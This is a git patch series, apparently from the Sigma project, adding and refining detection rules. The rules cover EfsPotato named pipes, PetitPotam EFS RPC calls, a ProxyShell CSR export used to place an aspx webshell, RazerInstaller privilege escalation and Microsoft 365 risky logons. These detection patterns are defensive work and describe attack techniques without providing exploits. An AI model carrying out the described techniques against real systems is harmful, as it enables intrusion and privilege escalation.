str(ast) + "\n") + return translate_group(ast) ''' Builds inputs field of OS monitor. diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 7bbeaeb0..4ba2f840 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -323,13 +323,13 @@ def main(): error = ERR_BACKEND if not cmdargs.defer_abort: sys.exit(error) - except (NotImplementedError, TypeError) as e: - print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) - print("Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma", file=sys.stderr) - if not cmdargs.ignore_backend_errors: - error = ERR_NOT_IMPLEMENTED - if not cmdargs.defer_abort: - sys.exit(error) + # except (NotImplementedError, TypeError) as e: + # print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) + # print("Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma", file=sys.stderr) + # if not cmdargs.ignore_backend_errors: + # error = ERR_NOT_IMPLEMENTED + # if not cmdargs.defer_abort: + # sys.exit(error) except PartialMatchError as e: print("Error: Partial field match error: %s" % str(e), file=sys.stderr) if not cmdargs.ignore_backend_errors: From dc3ed771b52a54ed2a82d3e524ece52becd824b1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 23 Aug 2021 08:32:50 +0200 Subject: [PATCH 0499/1367] rule: EfsPotato Named Pipe --- .../sysmon_efspotato_namedpipe.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml diff --git a/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml new file mode 100644 index 00000000..b80687c1 --- /dev/null +++ b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml @@ -0,0 +1,24 @@ +title: EfsPotato Named Pipe +id: 637f689e-b4a5-4a86-be0e-0100a0a33ba2 +status: experimental +description: Detects the pattern of a pipe name as used by the tool EfsPotato +references: + - https://twitter.com/SBousseaden/status/1429530155291193354?s=20 + - https://github.com/zcgonvh/EfsPotato +date: 2021/08/23 +author: Florian Roth +logsource: + product: windows + category: pipe_created + definition: 'Note that you have to configure logging for PipeEvents in Sysmon config' +detection: + selection: + PipeName|contains: '\pipe\' + condition: selection +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 +falsepositives: + - Unknown +level: critical From a0f72e5f6f5c2d6bd6a45e03d57e52d6358c4ce2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 23 Aug 2021 10:41:42 +0200 Subject: [PATCH 0500/1367] rule: suspicious splwow64 process starts --- .../process_creation/win_susp_splwow64.yml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_splwow64.yml diff --git a/rules/windows/process_creation/win_susp_splwow64.yml b/rules/windows/process_creation/win_susp_splwow64.yml new file mode 100644 index 00000000..3695fcec --- /dev/null +++ b/rules/windows/process_creation/win_susp_splwow64.yml @@ -0,0 +1,20 @@ +title: Suspicious Splwow64 Without Params +id: 1f1a8509-2cbb-44f5-8751-8e1571518ce2 +status: experimental +description: Detects suspicious Splwow64.exe process without any command line parameters +references: + - https://twitter.com/sbousseaden/status/1429401053229891590?s=12 +author: Florian Roth +date: 2021/08/23 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\splwow64.exe' + filter: + CommandLine|contains: 'splwow64.exe ' + condition: selection and not filter +falsepositives: + - Unknown +level: high From 82dde594d1d206289dfb479c9e788f8875e539dd Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Mon, 23 Aug 2021 11:17:10 +0200 Subject: [PATCH 0501/1367] feat: Add rule for malicious CSR export on Exchange --- ...ange_proxyshell_certificate_generation.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/other/win_exchange_proxyshell_certificate_generation.yml diff --git a/rules/windows/other/win_exchange_proxyshell_certificate_generation.yml b/rules/windows/other/win_exchange_proxyshell_certificate_generation.yml new file mode 100644 index 00000000..003bdd72 --- /dev/null +++ b/rules/windows/other/win_exchange_proxyshell_certificate_generation.yml @@ -0,0 +1,29 @@ +title: Certificate Request Export to Exchange Webserver +id: b7bc7038-638b-4ffd-880c-292c692209ef +status: experimental +description: Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell +references: + - https://twitter.com/GossiTheDog/status/1429175908905127938 +author: Max Altgelt +date: 2021/08/23 +logsource: + service: msexchange-management + product: windows +detection: + export_command: + - 'New-ExchangeCertificate' + - ' -GenerateRequest' + - ' -BinaryEncoded' + - ' -RequestFile' + export_params: + - '\\\\localhost\\C$' + - '\\\\127.0.0.1\\C$' + - 'C:\\inetpub' + - '.aspx' + condition: all of export_command and export_params +falsepositives: + - unlikely +level: critical +tags: + - attack.persistence + - attack.t1505.003 From 33c6ff6b5f4af8a416cf183074fe0f528c477328 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 23 Aug 2021 13:17:35 +0200 Subject: [PATCH 0502/1367] add powershell_suspicious_win32_pnpentity --- ...m_env.yml => powershell_detect_vm_env.yml} | 0 .../powershell_suspicious_win32_pnpentity.yml | 23 +++++++++++++++++++ 2 files changed, 23 insertions(+) rename rules/windows/powershell/{poweshell_detect_vm_env.yml => powershell_detect_vm_env.yml} (100%) create mode 100644 rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml diff --git a/rules/windows/powershell/poweshell_detect_vm_env.yml b/rules/windows/powershell/powershell_detect_vm_env.yml similarity index 100% rename from rules/windows/powershell/poweshell_detect_vm_env.yml rename to rules/windows/powershell/powershell_detect_vm_env.yml diff --git a/rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml b/rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml new file mode 100644 index 00000000..3cf7777d --- /dev/null +++ b/rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml @@ -0,0 +1,23 @@ +title: Powershell Suspicious Win32_PnPEntity +id: b26647de-4feb-4283-af6b-6117661283c5 +status: experimental +author: frack113 +date: 2021/08/23 +description: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md +tags: + - attack.discovery + - attack.t1120 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection: + EventID: 4104 + ScriptBlockText|contains: Win32_PnPEntity + condition: selection +falsepositives: + - admin script +level: low \ No newline at end of file From 25072e37b393bf2d6726034744b66e973f451d76 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 23 Aug 2021 13:30:46 +0200 Subject: [PATCH 0503/1367] update references --- rules/windows/process_creation/win_possible_applocker_bypass.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_possible_applocker_bypass.yml b/rules/windows/process_creation/win_possible_applocker_bypass.yml index 39ac4e71..6ebbdd45 100644 --- a/rules/windows/process_creation/win_possible_applocker_bypass.yml +++ b/rules/windows/process_creation/win_possible_applocker_bypass.yml @@ -5,6 +5,7 @@ status: experimental references: - https://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md author: juju4 date: 2019/01/16 modified: 2020/09/01 From 45f30cb2b43a9d3a419eab6b6df85116838a7003 Mon Sep 17 00:00:00 2001 From: SomeOne Date: Mon, 23 Aug 2021 15:00:07 +0200 Subject: [PATCH 0504/1367] Add fields to event log cleared --- rules/windows/builtin/win_event_log_cleared.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index 649d0d95..969f0630 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -18,6 +18,9 @@ detection: EventID: 1102 condition: selection fields: - - fields in the log source that are important to investigate further + - logon_id + - src_user + - src_user_id + - src_nt_domain falsepositives: - Legitimate administrative activity From 91b42f9077d11e202387beda5f3632251ba77d93 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 23 Aug 2021 15:03:59 +0200 Subject: [PATCH 0505/1367] fix: indentation --- .../pipe_created/sysmon_efspotato_namedpipe.yml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml index b80687c1..9d444f88 100644 --- a/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml +++ b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml @@ -3,8 +3,8 @@ id: 637f689e-b4a5-4a86-be0e-0100a0a33ba2 status: experimental description: Detects the pattern of a pipe name as used by the tool EfsPotato references: - - https://twitter.com/SBousseaden/status/1429530155291193354?s=20 - - https://github.com/zcgonvh/EfsPotato + - https://twitter.com/SBousseaden/status/1429530155291193354?s=20 + - https://github.com/zcgonvh/EfsPotato date: 2021/08/23 author: Florian Roth logsource: @@ -13,12 +13,14 @@ logsource: definition: 'Note that you have to configure logging for PipeEvents in Sysmon config' detection: selection: - PipeName|contains: '\pipe\' + PipeName|contains: + - '\pipe\' + - '\pipe\srvsvc' # more specific version (use only this one of the other causes too many false positives) condition: selection tags: - - attack.defense_evasion - - attack.privilege_escalation - - attack.t1055 + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 falsepositives: - Unknown level: critical From 037f33b5e200710140d11c9a9c644ddea01addab Mon Sep 17 00:00:00 2001 From: SomeOne Date: Mon, 23 Aug 2021 15:24:48 +0200 Subject: [PATCH 0506/1367] Replace by default windows fieldnames --- rules/windows/builtin/win_event_log_cleared.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index 969f0630..92c9a2ea 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -18,9 +18,9 @@ detection: EventID: 1102 condition: selection fields: - - logon_id - - src_user - - src_user_id - - src_nt_domain + - SubjectLogonId + - SubjectUserName + - SubjectUserSid + - SubjectDomainName falsepositives: - Legitimate administrative activity From 96e77eb8db5327a7f45a8fbd6127da1b792c8963 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 11:06:44 -0400 Subject: [PATCH 0507/1367] Create zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml --- ...rpc_potential_petit_potam_efs_rpc_call.yml | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml new file mode 100644 index 00000000..e6f2ddad --- /dev/null +++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml @@ -0,0 +1,46 @@ +title: Potential PetitPotam Attack via Usage of Encrypting File System RPC Calls. +id: bae2865c-5565-470d-b505-9496c87d0c30 +Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' +author: '@neu5ron, @Antonlovesdnb, Mike Remen' +date: 2021/08/17 +references: + - 'https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp' + - 'https://msrc.microsoft.com/update-guide/vulnerability/ADV210003' + - 'https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf' + - 'https://threatpost.com/microsoft-petitpotam-poc/168163/' +tags: + - attack.t1557.001 + - attack.t1187 +logsource: + product: zeek + service: dce_rpc +detection: + efs_operation: + endpoint|startswith: + - 'Efs' + - 'efs' + # EfsDecryptFileSrv' + # EfsRpcAddUsersToFile' + # EfsRpcAddUsersToFileEx' + # EfsRpcCloseRaw' + # EfsRpcDuplicateEncryptionInfoFile' + # EfsRpcEncryptFileExServ' + # EfsRpcEncryptFileSrv' + # EfsRpcFileKeyInfo' + # EfsRpcFileKeyInfoEx' + # EfsRpcFlushEfsCache' + # EfsRpcGetEncryptedFileMetadata' + # EfsRpcNotSupported' + # EfsRpcOpenFileRaw' + # EfsRpcQueryProtectors' + # EfsRpcQueryRecoveryAgents' + # EfsRpcQueryUsersOnFile' + # EfsRpcReadFileRaw' + # EfsRpcRemoveUsersFromFile' + # EfsRpcSetEncryptedFileMetadata' + # EfsRpcWriteFileRaw' + condition: efs_operation +falsepositives: + - 'Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).' +level: medium +status: stable From 78c667fda1980d26915434d4142c3839076efbf6 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 11:15:30 -0400 Subject: [PATCH 0508/1367] Update zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml shorten title --- ...rpc_potential_petit_potam_efs_rpc_call.yml | 46 ++++++++++++++++++- 1 file changed, 45 insertions(+), 1 deletion(-) diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index e6f2ddad..189f1843 100644 --- a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml +++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml @@ -1,4 +1,48 @@ -title: Potential PetitPotam Attack via Usage of Encrypting File System RPC Calls. +title: Potential PetitPotam Attack via EFS RPC Call +id: bae2865c-5565-470d-b505-9496c87d0c30 +Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' +author: '@neu5ron, @Antonlovesdnb, Mike Remen' +date: 2021/08/17 +references: + - 'https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp' + - 'https://msrc.microsoft.com/update-guide/vulnerability/ADV210003' + - 'https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf' + - 'https://threatpost.com/microsoft-petitpotam-poc/168163/' +tags: + - attack.t1557.001 + - attack.t1187 +logsource: + product: zeek + service: dce_rpc +detection: + efs_operation: + endpoint|startswith: + - 'Efs' + - 'efs' + # EfsDecryptFileSrv' + # EfsRpcAddUsersToFile' + # EfsRpcAddUsersToFileEx' + # EfsRpcCloseRaw' + # EfsRpcDuplicateEncryptionInfoFile' + # EfsRpcEncryptFileExServ' + # EfsRpcEncryptFileSrv' + # EfsRpcFileKeyInfo' + # EfsRpcFileKeyInfoEx' + # EfsRpcFlushEfsCache' + # EfsRpcGetEncryptedFileMetadata' + # EfsRpcNotSupported' + # EfsRpcOpenFileRaw' + # EfsRpcQueryProtectors' + # EfsRpcQueryRecoveryAgents' + # EfsRpcQueryUsersOnFile' + # EfsRpcReadFileRaw' + # EfsRpcRemoveUsersFromFile' + # EfsRpcSetEncryptedFileMetadata' + # EfsRpcWriteFileRaw' + condition: efs_operation +falsepositives: + - 'Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).' +level: medium id: bae2865c-5565-470d-b505-9496c87d0c30 Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' author: '@neu5ron, @Antonlovesdnb, Mike Remen' From 6aea58b4d2a4a53bee1426f2d624412be4d210e7 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 11:18:51 -0400 Subject: [PATCH 0509/1367] Update zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml --- ...rpc_potential_petit_potam_efs_rpc_call.yml | 71 +------------------ 1 file changed, 3 insertions(+), 68 deletions(-) diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index 189f1843..f03a8922 100644 --- a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml +++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml @@ -1,4 +1,4 @@ -title: Potential PetitPotam Attack via EFS RPC Call +title: Potential PetitPotam Attack via EFS RPC Calls id: bae2865c-5565-470d-b505-9496c87d0c30 Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' author: '@neu5ron, @Antonlovesdnb, Mike Remen' @@ -17,74 +17,9 @@ logsource: detection: efs_operation: endpoint|startswith: - - 'Efs' - - 'efs' - # EfsDecryptFileSrv' - # EfsRpcAddUsersToFile' - # EfsRpcAddUsersToFileEx' - # EfsRpcCloseRaw' - # EfsRpcDuplicateEncryptionInfoFile' - # EfsRpcEncryptFileExServ' - # EfsRpcEncryptFileSrv' - # EfsRpcFileKeyInfo' - # EfsRpcFileKeyInfoEx' - # EfsRpcFlushEfsCache' - # EfsRpcGetEncryptedFileMetadata' - # EfsRpcNotSupported' - # EfsRpcOpenFileRaw' - # EfsRpcQueryProtectors' - # EfsRpcQueryRecoveryAgents' - # EfsRpcQueryUsersOnFile' - # EfsRpcReadFileRaw' - # EfsRpcRemoveUsersFromFile' - # EfsRpcSetEncryptedFileMetadata' - # EfsRpcWriteFileRaw' + - 'Efs' + - 'efs' condition: efs_operation falsepositives: - 'Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).' level: medium -id: bae2865c-5565-470d-b505-9496c87d0c30 -Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' -author: '@neu5ron, @Antonlovesdnb, Mike Remen' -date: 2021/08/17 -references: - - 'https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp' - - 'https://msrc.microsoft.com/update-guide/vulnerability/ADV210003' - - 'https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf' - - 'https://threatpost.com/microsoft-petitpotam-poc/168163/' -tags: - - attack.t1557.001 - - attack.t1187 -logsource: - product: zeek - service: dce_rpc -detection: - efs_operation: - endpoint|startswith: - - 'Efs' - - 'efs' - # EfsDecryptFileSrv' - # EfsRpcAddUsersToFile' - # EfsRpcAddUsersToFileEx' - # EfsRpcCloseRaw' - # EfsRpcDuplicateEncryptionInfoFile' - # EfsRpcEncryptFileExServ' - # EfsRpcEncryptFileSrv' - # EfsRpcFileKeyInfo' - # EfsRpcFileKeyInfoEx' - # EfsRpcFlushEfsCache' - # EfsRpcGetEncryptedFileMetadata' - # EfsRpcNotSupported' - # EfsRpcOpenFileRaw' - # EfsRpcQueryProtectors' - # EfsRpcQueryRecoveryAgents' - # EfsRpcQueryUsersOnFile' - # EfsRpcReadFileRaw' - # EfsRpcRemoveUsersFromFile' - # EfsRpcSetEncryptedFileMetadata' - # EfsRpcWriteFileRaw' - condition: efs_operation -falsepositives: - - 'Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).' -level: medium -status: stable From 4f8bd4a5a254489ba43a1a8b8e9287ec7686fa13 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 11:24:22 -0400 Subject: [PATCH 0510/1367] Update zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml try new uuid to pass check... --- .../zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index f03a8922..b2186f1f 100644 --- a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml +++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml @@ -1,5 +1,5 @@ title: Potential PetitPotam Attack via EFS RPC Calls -id: bae2865c-5565-470d-b505-9496c87d0c30 +id: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' author: '@neu5ron, @Antonlovesdnb, Mike Remen' date: 2021/08/17 From 6b86dacc9e1da940324de3c1cab5fbf9b98b15b7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 23 Aug 2021 18:44:15 +0200 Subject: [PATCH 0511/1367] rule: razor installer --- .../win_susp_razorinstaller_explorer.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_razorinstaller_explorer.yml diff --git a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml new file mode 100644 index 00000000..967932cc --- /dev/null +++ b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml @@ -0,0 +1,22 @@ +title: Suspicious RazorInstaller Explorer Subprocess +id: a4eaf250-7dc1-4842-862a-5e71cd59a167 +status: experimental +description: Detects a explorer.exe sub process of the RazorInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM +references: + - https://twitter.com/j0nh4t/status/1429049506021138437 + - https://streamable.com/q2dsji +author: Florian Roth +date: 2021/08/23 +tags: + - attack.privilege_escalation +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\explorer.exe' + ParentImage|endswith: '\RazorInstaller.exe' + condition: selection +falsepositives: + - User selecting a different installation folder (check for other sub processes of this explorer.exe process) +level: high \ No newline at end of file From 998ebbe1f3bcb09ac2ebbf4818a863a5c91c2521 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 23 Aug 2021 18:46:05 +0200 Subject: [PATCH 0512/1367] fix: typo in name --- .../process_creation/win_susp_razorinstaller_explorer.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml index 967932cc..cffed858 100644 --- a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml +++ b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml @@ -1,7 +1,7 @@ -title: Suspicious RazorInstaller Explorer Subprocess +title: Suspicious RazerInstaller Explorer Subprocess id: a4eaf250-7dc1-4842-862a-5e71cd59a167 status: experimental -description: Detects a explorer.exe sub process of the RazorInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM +description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM references: - https://twitter.com/j0nh4t/status/1429049506021138437 - https://streamable.com/q2dsji @@ -15,7 +15,7 @@ logsource: detection: selection: Image|endswith: '\explorer.exe' - ParentImage|endswith: '\RazorInstaller.exe' + ParentImage|endswith: '\RazerInstaller.exe' condition: selection falsepositives: - User selecting a different installation folder (check for other sub processes of this explorer.exe process) From 9d3a13b13e9b372256cd0545e1b27c21a15648a4 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 23 Aug 2021 19:04:01 +0200 Subject: [PATCH 0513/1367] cleanup --- ...rpc_potential_petit_potam_efs_rpc_call.yml | 22 +++++++++++-------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index b2186f1f..c50ceb51 100644 --- a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml +++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml @@ -1,13 +1,17 @@ -title: Potential PetitPotam Attack via EFS RPC Calls +title: Potential PetitPotam Attack Via EFS RPC Calls id: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a -Description: 'Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' +description: | + Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. + The usage of this RPC function should be rare if ever used at all. + Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. + View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' author: '@neu5ron, @Antonlovesdnb, Mike Remen' date: 2021/08/17 references: - - 'https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp' - - 'https://msrc.microsoft.com/update-guide/vulnerability/ADV210003' - - 'https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf' - - 'https://threatpost.com/microsoft-petitpotam-poc/168163/' + - https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp + - https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 + - https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf + - https://threatpost.com/microsoft-petitpotam-poc/168163/ tags: - attack.t1557.001 - attack.t1187 @@ -17,9 +21,9 @@ logsource: detection: efs_operation: endpoint|startswith: - - 'Efs' - - 'efs' + - 'Efs' + - 'efs' condition: efs_operation falsepositives: - - 'Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).' + - Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description). level: medium From ae845594880b7ff3599a21785666bd71fb8dc5fa Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 17:18:16 +0000 Subject: [PATCH 0514/1367] M365 - Risky IP Addresses --- ...crosoft365_logon_from_risky_ip_address.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml diff --git a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml new file mode 100644 index 00000000..0530dbcf --- /dev/null +++ b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Log on from a risky IP address +id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f +status: experimental +description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Log on from a risky IP address" + status: success + condition: selection +falsepositives: + - Unkown +level: medium +tags: + - attack.initial_access + - attack.t1078 \ No newline at end of file From 3a4c61f44d63e584aea5c7abfc3122c39ae4a778 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 17:21:27 +0000 Subject: [PATCH 0515/1367] M365 - Inbox Manipulation Rules --- ...65_suspicious_inbox_manipulation_rules.yml | 24 +++++++++++++++++++ 